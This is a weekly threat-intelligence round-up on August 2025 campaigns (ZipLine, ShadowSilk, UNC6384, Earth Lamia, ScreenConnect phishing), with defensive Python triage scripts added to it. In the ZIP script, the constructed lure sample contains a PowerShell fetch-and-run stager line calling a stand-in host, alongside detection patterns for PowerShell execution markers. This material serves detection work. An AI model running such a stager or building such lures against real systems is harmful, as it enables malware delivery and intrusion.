
Weekly Cyber Round-up

Intelligence Report

August 28, 2025

ZipLine campaign leverages seemingly legitimate business interactions to deploy MixShell

Check Point researchers identified a social engineering campaign, dubbed ZipLine, that leverages seemingly legitimate business interactions to deploy a custom malware implant, dubbed MixShell, against manufacturing companies critical to the United States supply chain. The threat actor initiates contact via the target's ‘Contact Us’ form, so that the company is the party that starts the email correspondence, and maintains business-oriented communication for weeks before delivering a malicious ZIP archive. The archive, hosted on a trusted platform, contains legitimate PDF and DOCX files and a malicious LNK file, alongside a PowerShell script that is embedded directly in the ZIP archive's raw bytes. The LNK file executes the embedded PowerShell script in memory, which then establishes persistence via TypeLib hijacking. MixShell dynamically resolves Windows API functions, stores their addresses in the shellcode's main runtime structure, and creates a mutex to ensure only one instance is active per host. Earlier MixShell samples stored configuration values in plaintext; the shift to hex encoding and XOR encryption indicates that the developers are actively evolving the malware. A PowerShell-based variant was also identified, which establishes persistence via a scheduled task.
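The delivery pattern above (decoy documents plus a .lnk launcher, with the PowerShell stager living in archive bytes that belong to no listed member) can be checked for at the mail gateway or sandbox. The script below is an added example and not Check Point's code: it parses a ZIP, maps which byte ranges belong to members, and reports PowerShell marker strings found outside those ranges. The marker strings, file names and the exact hiding spot (the page does not say where in the binary the script sits; the constructed sample appends it after the end-of-central-directory record, which ZIP readers ignore) are assumptions.

```python
"""Triage a ZIP archive for the ZipLine delivery pattern: decoy documents,
a .lnk launcher, and PowerShell text hiding in archive bytes that belong to
no listed member. Added example, not Check Point's code; the archives below
are constructed for the demo and the marker strings are assumptions."""
import io
import re
import struct
import zipfile

# Loose PowerShell markers. Assumption: rare in document-only archives.
PS_MARKERS = re.compile(
    rb"(?i)(Invoke-Expression|\bIEX\s*\(|New-Object\s+Net\.WebClient|"
    rb"FromBase64String|\[System\.Reflection\.Assembly\]|Start-Process)"
)
DECOY_EXTS = (".pdf", ".docx", ".doc", ".xlsx")
LOCAL_HEADER_SIG = 0x04034B50


def member_ranges(raw, zf):
    """[(start, end, name)] covering each member's local header plus data.
    Name/extra lengths are read from the local header itself, since they
    can differ from the central directory copy."""
    ranges = []
    for info in zf.infolist():
        off = info.header_offset
        (sig,) = struct.unpack_from("<I", raw, off)
        if sig != LOCAL_HEADER_SIG:
            continue
        name_len, extra_len = struct.unpack_from("<HH", raw, off + 26)
        end = off + 30 + name_len + extra_len + info.compress_size
        ranges.append((off, end, info.filename))
    return ranges


def triage_zip(raw):
    zf = zipfile.ZipFile(io.BytesIO(raw))
    names = [i.filename for i in zf.infolist()]
    ranges = member_ranges(raw, zf)
    f = {
        "lnk_members": [n for n in names if n.lower().endswith(".lnk")],
        "decoy_members": [n for n in names if n.lower().endswith(DECOY_EXTS)],
        "ps_in_member": [],   # marker inside a (stored) member's bytes
        "ps_in_slack": [],    # marker in bytes owned by no member
    }
    for m in PS_MARKERS.finditer(raw):
        pos = m.start()
        owner = next((n for s, e, n in ranges if s <= pos < e), None)
        hit = (owner if owner else pos, m.group(0).decode("latin-1"))
        f["ps_in_member" if owner else "ps_in_slack"].append(hit)
    # Verdict: a launcher plus PowerShell text anywhere in the file is the
    # lure; decoys alone are what a normal business archive looks like.
    f["suspicious"] = bool(f["lnk_members"]) and bool(f["ps_in_slack"] or f["ps_in_member"])
    return f


def build_sample(with_launcher=True):
    """Constructed archive. With the launcher: two decoys, a .lnk posing as a
    PDF, and a PowerShell stager appended after the end-of-central-directory
    record, where ZIP readers ignore it but a script can seek to it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("NDA_draft.pdf", b"%PDF-1.7 decoy body")
        zf.writestr("Purchase_terms.docx", b"decoy docx body")
        if with_launcher:
            # LNK-shaped bytes: header size 0x4C then the ShellLink CLSID prefix.
            zf.writestr("Open_first.pdf.lnk", b"L\x00\x00\x00\x01\x14\x02\x00" + b"\x00" * 68)
    raw = buf.getvalue()
    if with_launcher:
        raw += (b"$z=Get-ChildItem $env:TEMP -Filter *.zip;"
                b"IEX ((New-Object Net.WebClient).DownloadString('http://stager.example/s'))")
    return raw


if __name__ == "__main__":
    for label, raw in (("lure", build_sample()), ("benign", build_sample(False))):
        print(label, triage_zip(raw))
```

Marker hits inside a stored member are reported separately from hits in slack space, because a STORED .ps1 member is a different (and more visible) lure than text hidden between structures; both are worth a verdict, only the second defeats tools that merely list the archive.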


ShadowSilk targets Asian government entities for data exfiltration

In late 2024, Group-IB researchers discovered the threat actor ShadowSilk orchestrating a series of attacks against government organizations in Central Asia and the Asia-Pacific region for data exfiltration. The activity has been ongoing since 2023 and remained active as of July 2025, with the most recent campaign taking place between January and July 2025. ShadowSilk leverages a wide range of tools and exploits, including the vulnerabilities CVE-2018-7600, CVE-2018-7602, and CVE-2024-27956, intrusion and control tooling such as Metasploit, Cobalt Strike, and the Godzilla webshell, and web panels for managing infected devices. For initial access, ShadowSilk uses phishing emails that lure recipients into opening a password-protected archive and running the executable inside. Once the binary is launched, the victim's device is infected with malware that uses Telegram for C2 communication. The attackers then download and launch additional malicious programs and modify the Windows registry for persistence. ShadowSilk consists of two sub-groups, YoroTrooper and Silent Lynx, and includes both Russian- and Chinese-speaking developers and operators.
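Telegram as a C2 channel has a detectable shape in web proxy logs: every Bot API call goes to api.telegram.org with the bot token in the URL path, and a beacon shows up as a steady cadence of getUpdates calls punctuated by send* uploads. The script below is an added example, not Group-IB's code; the proxy log lines and their field layout are constructed.

```python
"""Flag Telegram Bot API traffic in web proxy logs, the C2 channel described
for ShadowSilk's implant. Added example, not Group-IB's code; the log lines
are constructed and the field layout is an assumption."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Bot API URLs carry the bot token: /bot<numeric id>:<secret>/<method>.
# The numeric id is a safe blocking handle; the secret is the credential.
BOT_API = re.compile(
    r"^https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[\w-]{20,})/(?P<method>\w+)"
)
# Methods that upload content from the victim host, i.e. the exfil side.
EXFIL_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendAudio"}

# Constructed log, fields: "<iso time> <src ip> <verb> <url> <status> <user agent>".
SAMPLE_LOG = """\
2025-07-14T09:00:00Z 10.20.5.17 GET https://www.example.com/ 200 Mozilla/5.0 (Windows NT 10.0) Chrome/126
2025-07-14T09:00:05Z 10.20.5.17 POST https://api.telegram.org/bot7123456789:AAFxQ2yWv8LmNp0RtUvXyZ1aBcDeFgHiJk/getUpdates 200 python-requests/2.32
2025-07-14T09:00:35Z 10.20.5.17 POST https://api.telegram.org/bot7123456789:AAFxQ2yWv8LmNp0RtUvXyZ1aBcDeFgHiJk/getUpdates 200 python-requests/2.32
2025-07-14T09:01:05Z 10.20.5.17 POST https://api.telegram.org/bot7123456789:AAFxQ2yWv8LmNp0RtUvXyZ1aBcDeFgHiJk/getUpdates 200 python-requests/2.32
2025-07-14T09:01:07Z 10.20.5.17 POST https://api.telegram.org/bot7123456789:AAFxQ2yWv8LmNp0RtUvXyZ1aBcDeFgHiJk/sendDocument 200 python-requests/2.32
2025-07-14T09:02:00Z 10.20.5.42 GET https://web.telegram.org/a/ 200 Mozilla/5.0 (Windows NT 10.0) Chrome/126
"""


def parse_line(line):
    ts, src, verb, url, status, ua = line.split(" ", 5)
    return datetime.fromisoformat(ts.replace("Z", "+00:00")), src, verb, url, status, ua


def analyze(log_text):
    """Return {src_ip: finding} for every host that called the Bot API.
    Human Telegram use (web.telegram.org, the desktop client's MTProto
    endpoints) does not touch /bot<token>/ URLs, so it is not reported."""
    hosts = defaultdict(lambda: {"bot_ids": set(), "methods": defaultdict(int),
                                 "polls": [], "user_agents": set()})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, _verb, url, _status, ua = parse_line(line)
        m = BOT_API.match(url)
        if not m:
            continue
        h = hosts[src]
        h["bot_ids"].add(m["bot_id"])
        h["methods"][m["method"]] += 1
        h["user_agents"].add(ua)
        if m["method"] == "getUpdates":   # the long-poll is the beacon
            h["polls"].append(ts)
    findings = {}
    for src, h in hosts.items():
        polls = sorted(h["polls"])
        gaps = [(b - a).total_seconds() for a, b in zip(polls, polls[1:])]
        findings[src] = {
            "bot_ids": sorted(h["bot_ids"]),
            "methods": dict(h["methods"]),
            "poll_interval_s": median(gaps) if gaps else None,
            "exfil": sorted(set(h["methods"]) & EXFIL_METHODS),
            "user_agents": sorted(h["user_agents"]),
        }
    return findings


if __name__ == "__main__":
    for src, f in analyze(SAMPLE_LOG).items():
        print(src, f)
```

The bot id is what to put in a block rule or takedown request; the secret should be treated as a credential and redacted from tickets. A regular poll interval and a non-browser user agent are the two fields that separate an implant from an employee who wired up a chat bot.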

UNC6384 hijacks web traffic to deliver SOGU.SEC backdoor to diplomats

In March 2025, Google researchers discovered a campaign targeting diplomats in Southeast Asia and other entities globally, believed to support cyberespionage operations aligned with China's strategic interests. The attackers hijack the target's web traffic to deliver a digitally signed downloader, dubbed STATICPLUGIN, which retrieves a DLL, dubbed CANONSTAGER, that is loaded via DLL sideloading and in turn deploys a variant of the SOGU.SEC backdoor in memory. The malware is delivered under the guise of an Adobe plugin update: the attackers use an attacker-in-the-middle position to redirect users, via a captive portal, to a specific website. The landing page is blank aside from a yellow bar and a button asking the user to install a missing plugin, while JavaScript is silently loaded and executed in the background. The campaign has been attributed to UNC6384, which is believed to be associated with the China-linked threat actor TEMP.Hex.

Earth Lamia targets Vietnamese educational facilities with Cobalt Strike and tunnelling tools

Ctrl-Alt-Int3l researchers identified a Chinese threat actor that compromised at least 25 Vietnamese universities and educational facilities, using tools such as Cobalt Strike to persist within their environments and gather intelligence. The threat actor gained access by exploiting public-facing vulnerabilities with Metasploit, uploading Godzilla webshells, or through SQL injection. After gaining access, the attacker deployed Cobalt Strike beacons, exploited local Windows vulnerabilities for privilege escalation, and installed tunnelling software for persistent remote access. The tooling observed included the VShell and Cobalt Strike C2 frameworks, a persistent Remote Desktop Protocol tunnel, and .NET webshells. Similarities in C2 protocols and strings suggest the Linux-based SNOWLIGHT malware was used alongside VShell. Based on the overlap in activity and victimology, the campaign has been attributed to Earth Lamia.

Spear phishing campaign targets ScreenConnect cloud administrators for full remote control

Mimecast researchers identified an ongoing credential harvesting campaign that uses spear phishing emails sent through Amazon Simple Email Service accounts to target senior ScreenConnect cloud administrators. The attackers seek administrator credentials in order to take control of remote access infrastructure across organizations. The emails purport to be a new login alert and feature a ‘Review Security’ button that directs the user to one of two phishing pages, the first imitating the ScreenConnect login portal and the second the ConnectWise login portal. The Evilginx framework captures usernames, passwords, and multifactor authentication tokens in real time, enabling full access to ScreenConnect super admin accounts and the deployment of additional access tools or malware for lateral movement. The campaign has apparent connections to ransomware operations: Qilin ransomware affiliates use similar ScreenConnect targeting, likely as an initial access vector for ransomware deployment. Abnormal AI researchers observed a similar campaign that instead uses fake Zoom and Microsoft Teams invites to trick victims into installing ScreenConnect, enabling credential harvesting and full device control. Over 900 companies are known to have been targeted.
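The three observable traits of this lure (login-alert wording, a call-to-action link that lands off the vendor's domains, delivery through Amazon SES) can be checked mechanically before a message reaches an administrator. The script below is an added example, not Mimecast's code; both messages are constructed, and the allowlist of vendor domains is an assumption that a self-hosted or differently hosted tenant must adjust.

```python
"""Triage a login-alert email for the ScreenConnect phishing pattern: alert
wording, a call-to-action link that lands off the vendor's domains, and
delivery through Amazon SES. Added example, not Mimecast's code; both
messages are constructed and the vendor domain allowlist is an assumption."""
import re
from email import message_from_string, policy
from urllib.parse import urlparse

# Assumption: cloud ScreenConnect tenants are hosted under screenconnect.com
# and ConnectWise SSO under connectwise.com. Self-hosted instances need
# their own entries.
VENDOR_DOMAINS = {"screenconnect.com", "connectwise.com"}
SES_DOMAIN = "amazonses.com"
ALERT_PHRASES = ("new login", "review security", "unusual sign-in")

# Constructed phishing message, modelled on the lure the report describes.
PHISH_EML = """\
Return-Path: <0102019900aabbcc-bounce@amazonses.com>
From: "ScreenConnect Alerts" <security@screenconnect-alerts.example>
To: it-admin@corp.example
Subject: New login alert for your ScreenConnect account
Content-Type: text/html; charset="utf-8"

<html><body>
<p>A new login to your ScreenConnect admin account was detected.</p>
<p><a href="https://screenconnect-login.example/review?acct=it-admin">Review Security</a></p>
</body></html>
"""

# Constructed control: same wording, but the link stays on the tenant's host.
LEGIT_EML = """\
Return-Path: <bounce@mail.screenconnect.com>
From: "ScreenConnect" <noreply@screenconnect.com>
To: it-admin@corp.example
Subject: New login to your ScreenConnect account
Content-Type: text/html; charset="utf-8"

<html><body><p>New login from 203.0.113.10.</p>
<p><a href="https://corp.screenconnect.com/Login">Open ScreenConnect</a></p></body></html>
"""


def registrable(host):
    """Crude eTLD+1 (last two labels); enough for a short vendor allowlist."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def triage_email(raw):
    msg = message_from_string(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("html", "plain"))
    html = body.get_content() if body else ""
    text = (str(msg["subject"] or "") + " " + html).lower()
    hits = [p for p in ALERT_PHRASES if p in text]
    links = re.findall(r'href="([^"]+)"', html)
    off_domain = [u for u in links
                  if registrable(urlparse(u).hostname or "") not in VENDOR_DOMAINS]
    via_ses = SES_DOMAIN in str(msg["return-path"] or "").lower()
    return {
        "alert_phrases": hits,
        "off_domain_links": off_domain,
        "via_ses": via_ses,        # corroborating only; legitimate senders use SES too
        "verdict": "suspicious" if hits and off_domain else "clean",
    }


if __name__ == "__main__":
    print("phish ", triage_email(PHISH_EML))
    print("legit ", triage_email(LEGIT_EML))
```

The verdict keys on wording plus an off-domain link; SES delivery is reported but not scored, since vendors send through it as well. Note what this check cannot do: once the administrator follows the link, Evilginx relays the real login page, so the captured session is indistinguishable from a genuine one at the portal. Phishing-resistant MFA on the super admin accounts is the control that survives that step.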

Ransomware

Storm-0501's evolving techniques lead to cloud-based ransomware – Microsoft Security Blog – Aug 27 2025
The Underground Ransomware Gang Is Back with a Vicious New Global Campaign – Securityonline.info – Aug 27 2025
First known AI-powered ransomware uncovered by ESET Research – WeLiveSecurity – Aug 26 2025
Cephalus ransomware abuses SentinelOne executable for DLL sideloading – SC Media – Aug 25 2025
Colt Discloses Breach After Warlock Ransomware Group Puts Files Up for Sale – Security Affairs – Aug 22 2025
Examining the tactics of BQTLOCK Ransomware & its variants – K7 Computing Lab Blog – Aug 22 2025

Financial Services

The Price of Trust: Analyzing the Malware Campaign Exploiting TASPEN's Legacy to Target Indonesian Senior Citizens – CloudSEK Blog – Aug 27 2025
New Hook Android Banking Malware Emerges with Advanced Features and 107 Remote Commands – GBHackers On Security – Aug 26 2025
Financial Sector Threats: The Shifting Landscape – KnowBe4 Threat Reports – Aug 21 2025
Android Document Readers and Deception: Tracking the Latest Updates to Anatsa – Zscaler – Aug 21 2025
Evolving Mule Tactics in the META Region Banking Sector – Group-IB – Aug 20 2025

Geopolitics

Cyberattack on Israeli ‘kosher’ internet provider – DataBreaches.net – Aug 26 2025
Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System – CISA Cybersecurity Advisories – Aug 25 2025
‘Cyber partisans’ hack Russian TV, broadcast battlefield casualties and ‘truth’ about war, HUR source claims – The Kyiv Independent – Aug 25 2025
MURKY PANDA: Trusted-Relationship Cloud Threat – CrowdStrike blogs – Aug 21 2025
UAC-0057 keeps applying pressure on Ukraine and Poland – HarfangLab – Aug 20 2025

High Priority Vulnerabilities

Name             Software            CVSS base score   CVSS temporal score
CVE-2025-7775    NetScaler Gateway   9.8               7.7
  Related: Critical and high-severity flaws addressed in Citrix NetScaler ADC and NetScaler Gateway
CVE-2025-48384   Visual Studio       8.0               5.3
  Related: High-severity arbitrary file write flaw in Git actively exploited
CVE-2024-36401   GeoServer           9.8               9.4
  Related: Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth
CVE-2025-23312   NeMo Framework      7.8               7.8
CVE-2025-7783    form-data           5.6               5.4
  Related: Critical and high-severity flaws fixed across Atlassian products
